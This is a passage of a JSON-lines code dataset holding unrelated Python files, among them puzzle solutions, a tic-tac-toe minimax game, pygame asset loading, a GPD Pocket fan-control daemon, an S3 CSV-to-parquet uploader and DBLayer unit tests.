test_parts[0]\n test_load_gen_type = test_parts[1]\n test_branch = test_parts[2]\n release_name = test_parts[3]\n return test_date, test_load_gen_type, test_branch, release_name\n","repo_name":"istio/tools","sub_path":"perf_dashboard/helpers/bucket.py","file_name":"bucket.py","file_ext":"py","file_size_in_byte":5634,"program_lang":"python","lang":"en","doc_type":"code","stars":328,"dataset":"github-code","pt":"61"} +{"seq_id":"72494170434","text":"import os\nimport sys\n\n\nclass FileSysUtils:\n\n @staticmethod\n def validate_directory_path(name, path):\n if os.path.isdir(path):\n return True\n else:\n print(f'Provided {name} directory path does not point to a directory: {path}')\n sys.exit(2)\n\n @staticmethod\n def validate_file_path(name, path):\n if os.path.isfile(path):\n return True\n else:\n print(f'Provided {name} file path does not point to a file: {path}')\n sys.exit(2)","repo_name":"lair001/login-manager","sub_path":"src/login_manager/libs/utils/FileSysUtils.py","file_name":"FileSysUtils.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19359573753","text":"#!/usr/bin/env python3\n\nimport sys\n\nclass Ship:\n EAST = (0,1)\n WEST = (0,-1)\n NORTH = (1,0)\n SOUTH = (-1,0)\n\n RIGHT = -1\n LEFT = 1\n\n ccw_order = [EAST, NORTH, WEST, SOUTH]\n\n def __init__(self, direction, starting_pos = (0,0)):\n self.direction = direction\n self.position = starting_pos\n \n @staticmethod\n def _add_vec(pos, dpos):\n x,y = pos\n dx,dy = dpos\n\n return (x+dx,y+dy)\n\n def move_towards(self,direction, steps):\n x,y = direction\n direction = (x*steps, y*steps)\n self.position = Ship._add_vec(self.position, direction)\n\n def move_forward(self, steps):\n self.move_towards(self.direction,steps)\n \n def change_direction(self, d, steps):\n index = Ship.ccw_order.index(self.direction) + d*steps\n index = index % len(Ship.ccw_order)\n self.direction = Ship.ccw_order[index]\n\n def follow_command(self, command):\n c, steps = command[0], int(command[1:])\n turns = {'L' : Ship.LEFT,'R' : Ship.RIGHT}\n dirs = {'E' : Ship.EAST,'S': Ship.SOUTH,'N': Ship.NORTH,'W': Ship.WEST}\n moves = ['F']\n\n if c in turns:\n self.change_direction(turns[c], steps//90)\n elif c in dirs:\n self.move_towards(dirs[c], steps)\n elif c in moves:\n self.move_forward(steps)\n \n\n def follow_commands(self, commands):\n for comm in commands:\n self.follow_command(comm)\n print(self.position)\n\nif __name__ == \"__main__\":\n FILENAME = \"input.txt\"\n if len(sys.argv) > 1:\n FILENAME = sys.argv[1]\n \n with open(FILENAME) as inp:\n commands = [line.strip() for line in inp.readlines()]\n \n ship = Ship(Ship.EAST)\n ship.follow_commands(commands)\n x,y = ship.position\n print(f'The position of the ship is {ship.position} and manhattan distance {abs(x) + abs(y)}')","repo_name":"NewbieGoose/aoc2020","sub_path":"day12/directions.py","file_name":"directions.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24674892832","text":"N = 5\nmaxDepth = 3\nresults = {}\nimport random, re\n\nnextmove = ''\n\nfrom operator import itemgetter\nimport time, sys\n\nsys.setrecursionlimit(1000000)\n\n\nclass field:\n def __init__(self, fieldString):\n self.fieldString = fieldString\n\n def getPossibleMoves(self, move):\n\n fieldString = self.fieldString\n\n moves = []\n for i in range(0, N * N):\n if fieldString[i] == ' ':\n moves.append([fieldString[:i] + 
move.lower() + fieldString[i + 1:], 'N'])\n elif fieldString[i].lower() != move.lower() and str.islower(fieldString[i]):\n moves.append([fieldString[:i] + move.upper() + fieldString[i + 1:], 'R'])\n return moves\n\n def getScore(self, turnNumber):\n winner = self.getWinner()\n if (winner == 'X'):\n return (N * N - turnNumber) * 10 ** (N - 1)\n # return (N*N)*10**(N-1)\n elif (winner == 'O'):\n return (-N * N + turnNumber) * 10 ** (N - 1)\n # return (N*N)*10**(N-1)\n else:\n return 0;\n\n def gameEnded(self):\n if (' ' not in self.fieldString or self.getScore(0) != 0):\n return True\n else:\n return False\n\n def printField(self):\n print('\\n\\n')\n for i in range(0, N):\n print('-' * (4 * N + 1))\n print('|', end='')\n for j in range(0, N):\n print(' ' + self.fieldString[i * N + j] + ' |', end='')\n print('')\n print('-' * (4 * N + 1))\n\n def newMoveString(self, pos, move):\n if (self.fieldString[pos - 1] == ' '):\n return self.fieldString[:pos - 1] + move.lower() + self.fieldString[pos:]\n else:\n rand = random.uniform(0, 1)\n print('player is trying to invade another players cell! rand value:', rand)\n if (rand > 0.5):\n return self.fieldString[:pos - 1] + move.upper() + self.fieldString[pos:]\n else:\n return self.fieldString\n\n def getString(self):\n return self.fieldString\n\n def heuristic(self):\n currentField = (self.fieldString).upper()\n points = 0\n\n # X perspective\n # diag1\n line = currentField[0:N * N:N + 1]\n # finding consecutive length - stackoverflow\n lengthX = line.count('X')\n lengthO = line.count('O')\n # its pointless to continue row if there is other symbol\n if (lengthO == 0):\n points += 10 ** (lengthX - 1)\n if (lengthX == 0):\n points -= 10 ** (lengthO - 1)\n # diag2\n line = currentField[N - 1:N * N - 1:N - 1]\n lengthX = line.count('X')\n lengthO = line.count('O')\n if (lengthO == 0):\n points += 10 ** (lengthX - 1)\n if (lengthX == 0):\n points -= 10 ** (lengthO - 1)\n # verticals\n for i in range(0, N):\n line = currentField[i:N * N:N]\n lengthX = line.count('X')\n lengthO = line.count('O')\n if (lengthO == 0):\n points += 10 ** (lengthX - 1)\n if (lengthX == 0):\n points -= 10 ** (lengthO - 1)\n # horizontals\n for i in range(0, N):\n line = currentField[i * N:(i + 1) * N]\n lengthX = line.count('X')\n lengthO = line.count('O')\n if (lengthO == 0):\n points += 10 ** (lengthX - 1)\n if (lengthX == 0):\n points -= 10 ** (lengthO - 1)\n\n return round(points)\n\n def getSymmetryStrings(self):\n\n fieldString = (self.fieldString).upper()\n\n stringList = list(fieldString)\n symms = []\n\n # get vertical symmetry\n for i in range(0, N):\n for j in range(0, N // 2):\n stringList[i * N + j], stringList[(i + 1) * N - j - 1] = stringList[(i + 1) * N - j - 1], \\\n stringList[i * N + j]\n symms.append(''.join(stringList))\n\n # get horizontal symmetry\n stringList = list(fieldString)\n for i in range(0, N):\n for j in range(0, N // 2):\n stringList[j * N + i], stringList[(N - j - 1) * N + i] = stringList[(N - j - 1) * N + i], \\\n stringList[j * N + i]\n symms.append(''.join(stringList))\n\n '''#get reverse(?) 
symmetry\n stringList = list(fieldString)\n for i in range(0,N*N//2):\n stringList[i], stringList[N*N-1-i] = stringList[N*N-1-i], stringList[i]\n symms.append(''.join(stringList))'''\n\n # get diag1 symmetry\n stringList = list(fieldString)\n for i in range(0, N):\n for j in range(i, N):\n stringList[i * N + j], stringList[j * N + i] = stringList[j * N + i], stringList[i * N + j]\n symms.append(''.join(stringList))\n\n # get diag2 symmetry\n stringList = list(fieldString)\n for i in range(0, N):\n for j in range(0, N - i):\n stringList[i * N + j], stringList[(N - 1 - j) * N + (N - 1 - i)] = stringList[(N - 1 - j) * N + (\n N - 1 - i)], stringList[i * N + j]\n symms.append(''.join(stringList))\n\n return symms\n\n def getWinner(self):\n\n currentField = (self.fieldString).upper()\n\n # diag1\n line = currentField[0:N * N:N + 1]\n if (line[0] != ' ' and len(set(line)) == 1):\n return line[0]\n\n # diag2\n line = currentField[N - 1:N * N - 1:N - 1]\n if (line[0] != ' ' and len(set(line)) == 1):\n return line[0]\n\n # verticals\n for i in range(0, N):\n line = currentField[i:N * N:N]\n if (line[0] != ' ' and len(set(line)) == 1):\n return line[0]\n\n # horizontals\n for i in range(0, N):\n line = currentField[i * N:(i + 1) * N]\n if (line[0] != ' ' and len(set(line)) == 1):\n return line[0]\n\n return None\n\n def minimax(fieldString, move, depth, alpha, beta):\n\n currentField = field(fieldString);\n global mainField, nextmove\n\n symms = currentField.getSymmetryStrings()\n symmFound = False\n for symm in symms:\n if symm in results:\n if (depth > 0):\n return results[symm]\n\n if (depth > maxDepth):\n return currentField.heuristic()\n\n if (currentField.getWinner() is not None):\n return currentField.getScore(depth)\n\n if (currentField.gameEnded()):\n return 0;\n\n active_turn = move\n local_scores = []\n score = 0\n\n possibleMoves = currentField.getPossibleMoves(move)\n\n for possibleField in possibleMoves:\n if possibleField[0] in results:\n score = results[possibleField[0]]\n local_scores.append([possibleField[0], score, possibleField[1]])\n else:\n if possibleField[1] == 'R':\n if (depth > 50):\n return 0\n else:\n # good scenario\n score1 = minimax(possibleField[0], 'X' if (move == 'O') else 'O', depth + 1, alpha, beta)\n # bad scenario\n score2 = minimax(fieldString, 'X' if (move == 'O') else 'O', depth + 1, alpha, beta)\n score = int((score1 + score2) / 2)\n else:\n score = minimax(possibleField[0], 'X' if (move == 'O') else 'O', depth + 1, alpha, beta)\n local_scores.append([possibleField[0], score, possibleField[1]])\n results[possibleField[0]] = score\n\n if (depth == 0):\n print(local_scores, depth, N * N - depth, -N * N + depth)\n\n local_scores = sorted(local_scores, key=itemgetter(1), reverse=True)\n returnField = local_scores[0][0] if (active_turn == 'X') else local_scores[-1][0]\n returnScore = local_scores[0][1] if (active_turn == 'X') else local_scores[-1][1]\n moveType = local_scores[0][2] if (active_turn == 'X') else local_scores[-1][2]\n candidates = []\n\n '''for candidate in local_scores:\n if abs(candidate[1]-returnScore < 0.1):\n if (depth==0):\n print('we are appending candidate here , coz ',abs(candidate[1]-returnScore), abs(candidate[1]-returnScore) < 0.1)\n candidates.append(candidate)\n suggestion = random.choice(candidates)\n if (depth==0):\n print(candidates)'''\n if (depth == 0):\n if (moveType == 'R'):\n rand = random.uniform(0, 1)\n print ('computer is trying to capture your cell!! 
rand value', rand)\n if (rand > 0.5):\n newFieldString = returnField\n else:\n newFieldString = fieldString\n else:\n newFieldString = returnField\n field(newFieldString).printField()\n mainField = field(newFieldString)\n return returnScore\n\n mainField = field(' ' * N * N)\n\n while (not mainField.gameEnded()):\n minimax(mainField.getString(), 'X', 0, -99999, 99999)\n\n if mainField.gameEnded():\n break;\n\n fieldNum = int(input('Choose your move number '))\n mainField = field(mainField.newMoveString(fieldNum, 'O'))\n print('field after your move')\n mainField.printField()\n fieldNum = input('Press enter for computer move')\n\n if mainField.getWinner() is not None:\n print('Player', mainField.getWinner(), 'wins!')\n else:\n print ('Its a draw!')\n\n '''mainField = field('O O ')\n symms = mainField.getPossibleMoves('X')\n for sym in symms:\n print(sym)'''\n","repo_name":"PavelSafin/decision-theory","sub_path":"lab3/ttt_random.py","file_name":"ttt_random.py","file_ext":"py","file_size_in_byte":10334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72654281473","text":"'''\r\nA Pythagorean triplet is a set of three natural numbers, a < b < c, for which, a^2 + b^2 = c^2 \r\n\r\nFor example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2.\r\n\r\nThere exists exactly one Pythagorean triplet for which a + b + c = 1000. Find the product abc.\r\n'''\r\n\r\nimport numpy as np\r\n\r\na = 1\r\nb = 2\r\nc = 3\r\n\r\nfor C in range(c,1000):\r\n for B in np.arange(b,C):\r\n\r\n for A in np.arange(a,B):\r\n\r\n if (int(A + B + C) == 1000 and (A**2 + B**2 == C**2)):\r\n print(A,B,C)\r\n print(int(A*B*C))\r\n break\r\n\r\n if (int(A + B + C) == 1000 and (A**2 + B**2 == C**2)):\r\n break\r\n\r\n if (int(A + B + C) == 1000 and (A**2 + B**2 == C**2)):\r\n break\r\n\r\n","repo_name":"grahammauer/Project-Euler","sub_path":"9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29945955901","text":"\nimport os\nimport pygame\nimport random\nimport sys\n\nimport config\nimport gfxlib\n\npygame.init()\n\n\ndef resource_path(relative_path):\n try:\n # PyInstaller creates a temp folder and stores path in _MEIPASS\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n\n return os.path.join(base_path, relative_path)\n\ndef intro_background(display):\n colors = [\n (0, 0, 128),\n (64, 64, 192),\n (128, 64, 192),\n (192, 64, 128),\n (192, 0, 0),\n (0, 0, 0)\n ]\n for i in range(6):\n slice = pygame.Surface((display.Scale * display.Width, 50 * display.Scale))\n pygame.draw.rect(slice, colors[i], pygame.Rect(0, 0, display.Scale * display.Width, 50 * display.Scale))\n config.intro_slices.append(slice)\n\n config.scroll = pygame.Surface((display.Scale * display.Width * 9, 20 * display.Scale))\n blob1 = gfxlib.draw_string_surface(display.Scale, 'DROMEGADARUS', True)\n blob2 = gfxlib.draw_string_surface(display.Scale, '@JOACHIM LENNERSKANS 2022')\n blob3 = gfxlib.draw_string_surface(display.Scale, 'USE LEFT CTRL AND ARROWS')\n blob4 = gfxlib.draw_string_surface(display.Scale, 'PRESS THE ANY KEY')\n config.scroll.fill((0, 0, 0))\n config.scroll.blit(blob1, (display.Scale * 240 * 1, display.Scale * 2))\n config.scroll.blit(blob2, (display.Scale * 240 * 2, display.Scale * 6))\n config.scroll.blit(blob1, (display.Scale * 240 * 3, display.Scale * 2))\n config.scroll.blit(blob3, (display.Scale * 240 * 4, display.Scale * 6))\n 
config.scroll.blit(blob1, (display.Scale * 240 * 5, display.Scale * 2))\n config.scroll.blit(blob4, (display.Scale * 240 * 6, display.Scale * 6))\n \ndef background(display):\n colors = [\n (255, 64, 0),\n (255, 64, 0),\n (255, 64, 0),\n (255, 128, 64),\n (255, 128, 64),\n (255, 128, 64),\n (255, 128, 64),\n (255, 192, 64),\n (255, 192, 64),\n (255, 192, 64),\n (64, 128, 64),\n (64, 128, 64),\n (64, 128, 64),\n (64, 192, 64),\n (64, 192, 64),\n (64, 192, 64),\n (64, 192, 64),\n (64, 255, 64),\n (64, 255, 64),\n (64, 255, 64)\n ]\n\n for y in range(display.Height):\n for x in range(display.Width):\n i = 0 if x % 2 == y % 2 else 1\n if y < 60:\n j = int(y / 12) * 2\n else:\n j = int((y - 60) / 20) * 2 + 10\n \n pygame.draw.rect(display.Screen, colors[j + i], \n pygame.Rect(display.x(x), display.y(y), display.h(1), display.w(1)))\n\n config.background_screen = display.Screen.subsurface(\n pygame.Rect(display.x(0), display.y(0), display.w(display.Width), display.h(display.Height))\n ).copy()\n pygame.display.flip()\n\ndef toggle(map, y, x, char):\n if map[y][x] == 'X':\n return map\n elif char == '/' and map[y][x] == '\\\\':\n map[y][x] = 'V'\n elif char == '\\\\' and map[y][x] == '/':\n map[y][x] = 'V'\n else:\n map[y][x] = char\n\n return map\n\ndef mountains(display):\n mountain_width = 90\n config.mountain_gfx = pygame.Surface(((mountain_width + 30) * 8 * display.Scale, 72 * display.Scale))\n slice = config.background_screen.subsurface(pygame.Rect(0, 4 * display.Scale, 8 * display.Scale, 72 * display.Scale))\n for x in range(mountain_width + 30):\n config.mountain_gfx.blit(slice, (x * 8 * display.Scale, 0))\n\n character_lookup = {\n 'X': 58,\n 'V': 59,\n '/': 56,\n '\\\\': 57\n }\n\n # Create three levels of mountains at random\n character_offset = [0, -12, 4]\n heights = [7, 6, 5]\n numbers = [12, 10, 8]\n for level in range(3):\n map = []\n for y in range(7):\n map.append([])\n for x in range(mountain_width):\n map[y].append('.')\n\n for mountain in range(numbers[level]):\n height = random.randrange(2, heights[level] + 1)\n midx = random.randrange(height - 1, mountain_width - height)\n for i in range(height):\n y = 7 - height + i\n map = toggle(map, y, midx - i, '/')\n map = toggle(map, y, midx + i + 1, '\\\\')\n for x in range(i):\n map = toggle(map, y, midx - x, 'X')\n map = toggle(map, y, midx + x + 1, 'X')\n\n # Blit mountains\n for y in range(len(map)):\n for x in range(len(map[y])):\n if map[y][x] == '.':\n continue\n char = config.characters[character_lookup[map[y][x]] + character_offset[level]]\n config.mountain_gfx.blit(char, (x * 8 * display.Scale, (y + level) * 8 * display.Scale))\n if x < 30:\n config.mountain_gfx.blit(char, ((90 + x) * 8 * display.Scale, (y + level) * 8 * display.Scale))\n\n\n\ndef load(display):\n # Scale all gfx up with scale\n\n # Character set\n character_url = resource_path('images/Charset.png')\n character = pygame.image.load(character_url)\n for y in range(4):\n for x in range(16):\n onechar = character.subsurface(pygame.Rect(x * 8, y * 8, 8, 8))\n bigchar = pygame.transform.scale(onechar, (8 * display.Scale, 8 * display.Scale))\n config.characters.append(bigchar)\n biggerchar = pygame.transform.scale(onechar, (2 * 8 * display.Scale, 2 * 8 * display.Scale))\n config.big_characters.append(biggerchar)\n pygame.display.flip()\n\n # Intro\n intro_background(display)\n\n # Background\n background(display)\n mountains(display)\n\n # Dromedaries\n dromedary_url = resource_path('images/Dromedary.png')\n dromedary_pic = pygame.image.load(dromedary_url)\n for 
x in range(6):\n dromedary = dromedary_pic.subsurface(pygame.Rect(x * 32, 0, 32, 24))\n big_dromedary = pygame.transform.scale(dromedary, (32 * display.Scale, 24 * display.Scale))\n config.dromedaries.append(big_dromedary)\n pygame.display.flip()\n\n # Explosion\n explosion_url = resource_path('images/ExplodingCamel.png')\n explosion_pic = pygame.image.load(explosion_url)\n for x in range(8):\n exploding_camel = explosion_pic.subsurface(pygame.Rect(x * 16, 0, 16, 16))\n big_exploding_camel = pygame.transform.scale(exploding_camel, (16 * display.Scale, 16 * display.Scale))\n config.exploding_camels.append(big_exploding_camel)\n\n # Lightning\n lightning_url = resource_path('images/Blixt.png')\n lightning_pic = pygame.image.load(lightning_url)\n for y in range(6):\n lightning = lightning_pic.subsurface(pygame.Rect(0, y * 5, 14, 5))\n big_lightning = pygame.transform.scale(lightning, (14 * display.Scale, 5 * display.Scale))\n config.lightning.append(big_lightning)\n\n \n","repo_name":"Lennerskans/dromegadarus","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":6837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21809698384","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\n# Full credit goes to efluffy at https://github.com/efluffy/gpdfand\n# This script is simply re-written in python to avoid perl dependencies\n\nfrom glob import glob\nfrom time import sleep\nimport argparse\nimport io\nimport os.path\nimport signal\nimport sys\n\n# Parse command line arguments\nparser = argparse.ArgumentParser()\nparser.add_argument('--time', type=int, help='Time between temperature checks', default=10)\nparser.add_argument('--turbo', type=int, help='Maximum temperature before turbo boost is disabled', default=60)\nparser.add_argument('--min', type=int, help='Temperature required for minimum fan speed', default=45)\nparser.add_argument('--med', type=int, help='Temperature required for medium fan speed', default=55)\nparser.add_argument('--max', type=int, help='Temperature required for maximum fan speed', default=65)\nargs = parser.parse_args()\n\n# Exit function\ndef exit(*args):\n set_fans(0,0)\n set_no_turbo(0)\n sys.exit(0)\n\n# Get temperature function\ndef get_temp():\n temps = []\n for hwmon in glob('/sys/devices/platform/coretemp.0/hwmon/hwmon*'):\n for temp_input_dev in glob(hwmon + '/temp*_input'):\n with io.open(temp_input_dev, 'r') as core_temp:\n temp = int(core_temp.read()) / 1000\n temps.append(temp)\n if(len(temps) > 0): \t\n return max(temps)\n else:\n return 0\n\n# Set fans function\ndef set_fans(a,b):\n with io.open('/sys/class/gpio/gpio341/value', 'w') as gpio:\n gpio.write(unicode(a))\n with io.open('/sys/class/gpio/gpio342/value', 'w') as gpio:\n gpio.write(unicode(b))\n\n# Set no turbo boost function\ndef set_no_turbo(state):\n with io.open('/sys/devices/system/cpu/intel_pstate/no_turbo', 'w') as no_turbo:\n no_turbo.write(unicode(state))\n\n# Initialization function\ndef init():\n for id in [341,342]:\n if not os.path.isfile('/sys/class/gpio/gpio' + str(id) + '/value'):\n with io.open('/sys/class/gpio/export', 'w') as gpio_export:\n gpio_export.write(unicode(id))\n\n# Perform initialization\ninit()\n\n# Setup exit handler\nsignal.signal(signal.SIGTERM, exit)\n\n# Rinse, repeat.\nwhile True:\n temp = get_temp()\n\n # Set fan speed\n if temp >= args.max or temp == 0:\n set_fans(1,1)\n elif temp >= args.med:\n set_fans(0,1)\n elif temp >= args.min:\n set_fans(1,0)\n else:\n 
set_fans(0,0)\n\n # Set turbo boost state\n if temp >= args.turbo:\n set_no_turbo(1)\n else:\n set_no_turbo(0)\n\n sleep(args.time)\n","repo_name":"stockmind/gpd-pocket-ubuntu-respin","sub_path":"fan/gpdfand.py","file_name":"gpdfand.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"61"} +{"seq_id":"5648759557","text":"import os\nimport re\nimport sys\nimport s3fs\nimport glob\nimport signal\nimport logging\nimport argparse\n\nfrom tqdm.auto import tqdm\nfrom contextlib import closing\nfrom multiprocessing import get_context\n\nimport pandas as pd\nfrom os.path import join, basename, expanduser\n\nfrom collect import save_option_data\n\nlogging.basicConfig(format='%(asctime)s [%(levelname)s] %(message)s')\nlogger = logging.getLogger()\nlogger.setLevel(logging.WARNING)\n\ndef column_remap(col):\n custom = {\n 'TheoreticalVol': 'theoretical_vol',\n 'NonStandard': 'non_standard'\n }\n if col in custom:\n return custom[col]\n return col.lower()\n\ndef convert(item):\n file, dest, s3_client = item\n\n df = pd.read_csv(file).rename(columns=column_remap)\n date, symbol = df.date[0], re.sub('\\.csv.*', '', basename(file))\n fn = join(dest, symbol, f'{date}.parquet')\n\n if s3_client is not None and s3_client.exists(fn):\n logger.warning(f'Skipping {fn}')\n return\n logger.info(f'{file} => {fn}')\n save_option_data(df, fn, s3_client=s3_client)\n\ndef get_file_list(pattern):\n return glob.glob(expanduser(pattern))\n\ndef main():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('file', nargs='+',\n help='CSV options files or to convert (wildcard OK)')\n parser.add_argument('--parallelism', default=4, type=int,\n help='how many files at a time to process')\n parser.add_argument('--dest', default='.',\n help='Where to save the converted files')\n\n args = parser.parse_args()\n\n s3_client = None\n if args.dest.startswith('s3://'):\n s3_client = s3fs.S3FileSystem(client_kwargs={\n 'endpoint_url': os.getenv('ENDPOINT_URL')\n })\n files = sum([get_file_list(p) for p in args.file], [])\n work_items = [(f, args.dest, s3_client) for f in files]\n processes = min(args.parallelism, len(work_items))\n\n with closing(get_context('spawn').Pool(processes)) as p:\n status = {'desc': 'Processing', 'total': len(files)}\n _ = list(tqdm(p.imap(convert, work_items), **status))\n\n\ndef signal_handler(signal, frame):\n sys.exit(0)\n\nif __name__ == '__main__':\n signal.signal(signal.SIGINT, signal_handler)\n main()\n\n","repo_name":"loukad/options-collector","sub_path":"upload_historical.py","file_name":"upload_historical.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19650378896","text":"# -*- encoding: utf-8 -*-\nfrom flask import Flask\n\nfrom App.ext import init_ext, scheduler\nfrom App.settings import envs\nfrom App.views import init_views\nfrom datetime import datetime\n\n\ndef print_time():\n time_now = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n print(\"time:{}\".format(time_now))\n\n\ndef create_app(env):\n app = Flask(__name__, static_folder=\"../static\")\n app.config.from_object(envs.get(env))\n\n init_ext(app)\n\n init_views(app)\n scheduler.remove_job(id='job01')\n scheduler.add_job(id=\"job01\", func=print_time, trigger='cron', day_of_week=\"*\", hour=14,\n minute=18, second=59)\n scheduler.start()\n return 
app\n","repo_name":"aaaasule/stu_flask","sub_path":"day22/App/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39575082594","text":"# pylint: disable=protected-access\n\nimport pytest\n\nfrom zetta_utils.layer.db_layer import DBLayer, build_db_layer\n\n\ndef test_write_scalar(mocker) -> None:\n backend = mocker.MagicMock()\n backend.write = mocker.MagicMock()\n layer = build_db_layer(backend)\n\n layer[\"key\"] = \"val\"\n assert backend.write.call_args.kwargs[\"data\"] == [{\"value\": \"val\"}]\n\n\ndef test_write_list(mocker) -> None:\n backend = mocker.MagicMock()\n backend.write = mocker.MagicMock()\n\n layer = build_db_layer(backend)\n\n idx_user = [\"key0\", \"key1\"]\n data_user = [\"val0\", \"val1\"]\n layer[idx_user] = data_user\n assert backend.write.call_args.kwargs[\"data\"] == [{\"value\": \"val0\"}, {\"value\": \"val1\"}]\n\n\ndef test_write_single_row(mocker) -> None:\n backend = mocker.MagicMock()\n backend.write = mocker.MagicMock()\n\n layer = build_db_layer(backend)\n\n row_key = \"key\"\n col_keys = (\"col0\", \"col1\")\n idx_user = (row_key, col_keys)\n\n data_user = {\n \"col0\": \"val0\",\n \"col1\": \"val1\",\n }\n\n layer[idx_user] = data_user\n assert backend.write.call_args.kwargs[\"data\"] == [{\"col0\": \"val0\", \"col1\": \"val1\"}]\n\n\ndef test_write_rows(mocker) -> None:\n backend = mocker.MagicMock()\n backend.write = mocker.MagicMock()\n layer = build_db_layer(backend)\n\n row_keys = [\"key0\", \"key1\"]\n idx_user = (row_keys, (\"col0\", \"col1\"))\n\n data_user = [\n {\"col0\": \"val0\", \"col1\": \"val1\"},\n {\"col0\": \"val0\"},\n ]\n\n layer[idx_user] = data_user\n assert backend.write.call_args.kwargs[\"data\"] == data_user\n\n\ndef test_write_exc(mocker):\n backend = mocker.MagicMock()\n backend.write = mocker.MagicMock()\n\n layer = build_db_layer(backend)\n with pytest.raises(TypeError):\n layer[\"key\"] = object # type: ignore\n\n with pytest.raises(ValueError):\n layer[\"key\"] = mocker.MagicMock()\n\n\n@pytest.mark.parametrize(\n \"idx_user, data, expected\",\n [\n [\n \"key0\",\n [{\"value\": \"val0\"}],\n \"val0\",\n ],\n [\n \"key42\",\n [{\"value\": 42}],\n 42,\n ],\n [\n [\"key0\", \"key42\"],\n [{\"value\": \"val0\"}, {\"value\": 42}],\n [\"val0\", 42],\n ],\n [\n (\"key1\", (\"col0\", \"col1\")),\n [{\"col0\": \"val0\", \"col1\": \"val1\"}],\n {\"col0\": \"val0\", \"col1\": \"val1\"},\n ],\n [\n ([\"key1\", \"key2\"], (\"col0\", \"col1\")),\n [{\"col0\": \"val0\", \"col1\": \"val1\"}, {\"col0\": None, \"col1\": \"val2\"}],\n [{\"col0\": \"val0\", \"col1\": \"val1\"}, {\"col0\": None, \"col1\": \"val2\"}],\n ],\n ],\n)\ndef test_db_read_convert(\n idx_user,\n data,\n expected,\n mocker,\n):\n layer = DBLayer(backend=mocker.MagicMock())\n result = layer._convert_read_data(idx_user, data)\n assert result == expected\n","repo_name":"ZettaAI/zetta_utils","sub_path":"tests/unit/layer/db_layer/test_build.py","file_name":"test_build.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"9325906037","text":"import os, sys, time\n\n## bulk renaming not implemented yet\ndef renamefiles():\n if sys.platform == \"win32\" : os.system(\"cls\")\n elif sys.platform == \"linux\" : os.system(\"clear\")\n\n print(\"=============================================================\")\n print(\" -- File Renaming Tool -- 
\")\n print(\"=============================================================\")\n\n print(\"\\n Type 'Exit' at any time to return to the main menu! \")\n print(\"=============================================================\")\n print(\" State the name of a file and its file extention \")\n print(\" you would like to rename! \")\n print(\"=============================================================\")\n file = str(input(\">> \"))\n\n if file.upper() == \"EXIT\":\n return\n\n if sys.platform == \"win32\" : os.system(\"cls\")\n elif sys.platform == \"linux\" : os.system(\"clear\")\n\n while True:\n print(\"=============================================================\")\n newFile = str(input(f\"What would you like to rename the file '{file}' to? >> \"))\n\n if sys.platform == \"win32\" : os.system(\"cls\")\n elif sys.platform == \"linux\" : os.system(\"clear\")\n\n try: \n \n x = newFile.find(\".\")\n\n if x == -1:\n name = newFile\n ext = file[file.find(\".\"):]\n \n else:\n name = newFile[:x]\n ext = newFile[x:]\n\n if sys.platform == \"win32\": os.rename(f\"{os.path.dirname(os.getcwd())}\\\\{file}\", f\"{os.path.dirname(os.getcwd())}\\\\{name}{ext}\")\n elif sys.platform == \"linux\": os.rename(f\"{os.path.dirname(os.getcwd())}/{file}\", f\"{os.path.dirname(os.getcwd())}/{name}{ext}\")\n \n print(\"=============================================================\")\n print(f\"Old file name >> {file}\\nNew File name {name}{ext}\")\n print(\"=============================================================\")\n print(\"\\n\")\n\n for i in range(0, 3):\n print(f\"Returning to main menu in {3-i} second[s]!\", end=\"\\r\")\n time.sleep(1)\n print(\"=============================================================\")\n return 0\n\n except:\n for i in range(1, 4): \n print(f\"File name: {file} doesnt exist / couldnt be renamed, returning to main menu\", \".\"*i, end=\"\\r\")\n time.sleep(1)\n \n return\n\n return","repo_name":"CallumB04/FileHandlingTool","sub_path":"Scripts/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17614977073","text":"import logging\nlog = logging.getLogger(\"zen.migrate\")\n\nimport Migrate\nimport servicemigration as sm\nsm.require(\"1.0.0\")\n\n\nclass CheckHBaseTablesExist(Migrate.Step):\n \"\"\"\n Add existence of HBase tables to the Prereqs of OpenTSDB reader.\n See ZEN-24094\n \"\"\"\n\n version = Migrate.Version(108, 0, 0)\n\n def cutover(self, dmd):\n try:\n ctx = sm.ServiceContext()\n except sm.ServiceMigrationError:\n log.info(\"Couldn't generate service context, skipping.\")\n return\n\n # Find the services to edit.\n # For \"lite\" services, there is a single opentsdb service and, it should\n # not be edited. For \"full\" services, the opentsdb service is an organizer\n # with reader and writer subservices. 
